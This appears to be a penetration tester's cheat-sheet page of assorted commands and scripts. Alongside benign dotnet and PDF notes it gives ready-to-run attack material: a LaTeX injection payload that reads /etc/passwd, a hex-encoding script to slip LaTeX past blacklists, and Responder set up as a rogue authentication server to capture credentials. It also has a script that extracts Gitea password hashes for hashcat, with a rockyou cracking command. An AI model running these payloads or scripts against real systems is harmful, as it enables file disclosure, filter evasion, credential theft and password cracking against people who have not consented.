Skip to main content

Misc

Basic Kali install

sudo apt install terminator ghidra seclists zaproxy gobuster

Git Dumper

pip install git-dumper
git-dumper https://<host>/.git ./out

LaTeX

Basic file read

\documentclass[12pt]{article}
\usepackage{verbatim}
\begin{document}
\verbatiminput{/etc/passwd}
\end{document}

Bypass blacklist/whitelist

Js script to obfuscate LaTeX as hex values

// leetLatexObfuscator.js
const fs = require('fs')
const args = process.argv.slice(2);
const scriptContent = fs.readFileSync(args[0]).toString()
const parsed = scriptContent.split('\n').map(line => line.split('').map(char => "^^" + Number(char.charCodeAt(0)).toString(16)).join('')).join("\n")
fs.writeFileSync(args[1], parsed)
node leetLatexObfuscator.js input.txt output.txt

Dotnet

dotnet new console -n Honk
dotnet build
dotnet run
dotnet publish -c Release
dotnet publish -c Release -r win-x64 --self-contained -p:PublishSingleFile=true -p:PublishTrimmed=true
<!-- for dll -->
<Project Sdk="Microsoft.NET.Sdk">
<PropertyGroup>
<AssemblyName>Honk</AssemblyName>
<OutputType>Library</OutputType>
<!-- netstandard2.0 for compatibility -->
<TargetFramework>netstandard2.0</TargetFramework>
</PropertyGroup>
</Project>

Responder

HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server

responder -I tun0 -wA

PDF stuff

Create empty pdf

convert xc:none -page A4 empty.pdf

Empty pdf MIME

%PDF-1.2 
1 0 obj
<<
/Title (empty)
/CreationDate (D:20231107231620)
/ModDate (D:20231107231620)
/Producer (xxxx)
>>
endobj
%%EOF

Gitea

DB to hashcat

import sqlite3
import base64
import sys

if len(sys.argv) != 2:
print("Usage: python hacc.py <gitea-db-file>")
sys.exit(1)

try:
con = sqlite3.connect(sys.argv[1])
cursor = con.cursor()
cursor.execute("SELECT name,passwd_hash_algo,salt,passwd FROM user")
for row in cursor.fetchall():
if "pbkdf2" in row[1]:
algo, iterations, keylen = row[1].split("$")
algo = "sha256"
name = row[0]
else:
raise Exception("Unknown Algorithm")
salt = bytes.fromhex(row[2])
passwd = bytes.fromhex(row[3])
salt_b64 = base64.b64encode(salt).decode("utf-8")
passwd_b64 = base64.b64encode(passwd).decode("utf-8")
print(f"{name}")
print(f"{algo}:{iterations}:{salt_b64}:{passwd_b64}")
print("")

except Exception as e:
print(f"Error: {e}")
sys.exit(1)
hashcat -m 10900 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt